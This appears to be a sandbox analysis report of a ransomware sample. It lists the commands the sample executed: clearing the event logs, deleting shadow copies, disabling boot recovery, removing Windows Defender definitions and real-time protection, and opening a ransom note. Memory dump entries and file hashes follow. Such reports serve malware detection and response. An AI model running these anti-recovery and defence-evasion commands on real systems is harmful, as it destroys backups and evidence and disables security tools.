C:\Windows\system32\wevtutil.exe
wevtutil.exe cl security
C:\Windows\system32\wevtutil.exe
wevtutil.exe cl application
C:\Windows\System32\Wbem\wmic.exe
wmic.exe SHADOWCOPY /nointeractive
C:\Windows\System32\Wbem\wmic.exe
wmic.exe shadowcopy delete
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
C:\Windows\system32\bcdedit.exe
bcdedit.exe /set {default} recoveryenabled no
C:\Windows\system32\cmd.exe
cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Program Files\Windows Defender\MpCmdRun.exe
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIOAVProtection $true
C:\Windows\system32\cmd.exe
cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableRealtimeMonitoring $true
C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\qj7U_HOW_TO_DECRYPT.txt
Network
Files
memory/1820-54-0x0000000000000000-mapping.dmp
memory/516-55-0x0000000000000000-mapping.dmp
memory/580-56-0x0000000000000000-mapping.dmp
memory/556-57-0x0000000000000000-mapping.dmp
memory/856-58-0x0000000000000000-mapping.dmp
memory/1732-59-0x0000000000000000-mapping.dmp
memory/564-60-0x0000000000000000-mapping.dmp
memory/604-61-0x0000000000000000-mapping.dmp
memory/1800-62-0x0000000000000000-mapping.dmp
memory/276-63-0x0000000000000000-mapping.dmp
memory/1928-64-0x0000000000000000-mapping.dmp
memory/1000-65-0x0000000000000000-mapping.dmp
memory/1840-66-0x0000000000000000-mapping.dmp
memory/1996-67-0x0000000000000000-mapping.dmp
memory/1992-68-0x0000000000000000-mapping.dmp
memory/1360-69-0x0000000000000000-mapping.dmp
memory/1364-70-0x0000000000000000-mapping.dmp
memory/2028-71-0x0000000000000000-mapping.dmp
memory/932-72-0x0000000000000000-mapping.dmp
memory/1148-73-0x0000000000000000-mapping.dmp
memory/920-74-0x0000000000000000-mapping.dmp
memory/1752-75-0x0000000000000000-mapping.dmp
memory/1156-76-0x0000000000000000-mapping.dmp
memory/1572-77-0x0000000000000000-mapping.dmp
memory/1916-78-0x0000000000000000-mapping.dmp
memory/1920-79-0x0000000000000000-mapping.dmp
memory/544-80-0x0000000000000000-mapping.dmp
memory/1732-81-0x0000000000000000-mapping.dmp
memory/776-82-0x0000000000000000-mapping.dmp
memory/1108-83-0x0000000000000000-mapping.dmp
memory/1780-84-0x0000000000000000-mapping.dmp
memory/836-85-0x0000000000000000-mapping.dmp
memory/2004-86-0x0000000000000000-mapping.dmp
memory/1300-87-0x0000000000000000-mapping.dmp
memory/1776-88-0x0000000000000000-mapping.dmp
memory/1708-89-0x0000000000000000-mapping.dmp
memory/880-90-0x0000000000000000-mapping.dmp
memory/1684-91-0x0000000000000000-mapping.dmp
memory/1600-92-0x0000000000000000-mapping.dmp
memory/1696-93-0x0000000000000000-mapping.dmp
memory/1584-94-0x0000000000000000-mapping.dmp
memory/556-95-0x0000000000000000-mapping.dmp
memory/1860-96-0x0000000000000000-mapping.dmp
memory/276-97-0x0000000000000000-mapping.dmp
memory/1000-98-0x0000000000000000-mapping.dmp
memory/1360-99-0x0000000000000000-mapping.dmp
memory/952-100-0x0000000000000000-mapping.dmp
memory/1692-101-0x0000000000000000-mapping.dmp
memory/1960-102-0x0000000000000000-mapping.dmp
memory/1160-103-0x0000000000000000-mapping.dmp
memory/516-104-0x0000000000000000-mapping.dmp
memory/1728-105-0x0000000000000000-mapping.dmp
memory/648-106-0x0000000000000000-mapping.dmp
memory/1512-107-0x0000000000000000-mapping.dmp
memory/2008-108-0x0000000000000000-mapping.dmp
memory/1948-109-0x0000000000000000-mapping.dmp
memory/860-110-0x0000000000000000-mapping.dmp
memory/1272-111-0x0000000000000000-mapping.dmp
memory/832-112-0x0000000000000000-mapping.dmp
memory/832-113-0x000007FEFC0E1000-0x000007FEFC0E3000-memory.dmp
memory/964-114-0x0000000000000000-mapping.dmp
memory/896-116-0x0000000000000000-mapping.dmp
memory/632-118-0x0000000000000000-mapping.dmp
memory/684-119-0x0000000000000000-mapping.dmp
memory/1504-120-0x0000000000000000-mapping.dmp
memory/2100-123-0x0000000002860000-0x0000000002862000-memory.dmp
memory/2100-124-0x0000000002862000-0x0000000002864000-memory.dmp
memory/2100-125-0x0000000002864000-0x0000000002867000-memory.dmp
memory/2100-122-0x000007FEF3360000-0x000007FEF3EBD000-memory.dmp
memory/2100-126-0x000000001B700000-0x000000001B9FF000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | 8d2d0961a67adf17fd1ef544bd79816e |
| SHA1 | a734ebe44e5b4a5525d7eda276c1a669dfcfc3d0 |
| SHA256 | 8a81b743bfd00b5e2d0bb951ac7b6e9c98d9bc0b41432b8aa12e4e700b8b9434 |
| SHA512 | 888f26b0ef14a34e757a5ef9c0841f8b6595d0d388570f2872bda4af54b4775c34c1d9e234e6fdcf64292f7e168a1fbb7b48112b9cbfc3e4cde27cda06816204 |
memory/2100-130-0x000000000286B000-0x000000000288A000-memory.dmp
memory/2192-129-0x000007FEF29C0000-0x000007FEF351D000-memory.dmp
memory/2192-131-0x00000000027C0000-0x00000000027C2000-memory.dmp
memory/2192-132-0x00000000027C2000-0x00000000027C4000-memory.dmp
memory/2192-133-0x00000000027C4000-0x00000000027C7000-memory.dmp
memory/2192-134-0x00000000027CB000-0x00000000027EA000-memory.dmp
C:\Users\Admin\Desktop\qj7U_HOW_TO_DECRYPT.txt
| MD5 | cbf145a79d560c063735d60f302b8027 |
| SHA1 | 52712f0608368894b0bf55c60aa9fdb5501900eb |
| SHA256 | fd11274fbef91be21d5c83b4f6e86f5907ad4908cb50b98e370566b5089cf51c |
| SHA512 | 57febf49b7eab8b90bdef86116034f1d80228bc6313c4af43d164656c23b8b3052d571bd0b6180cbdccf867a250a81aa83b81401cfd449416c01e0681954a776 |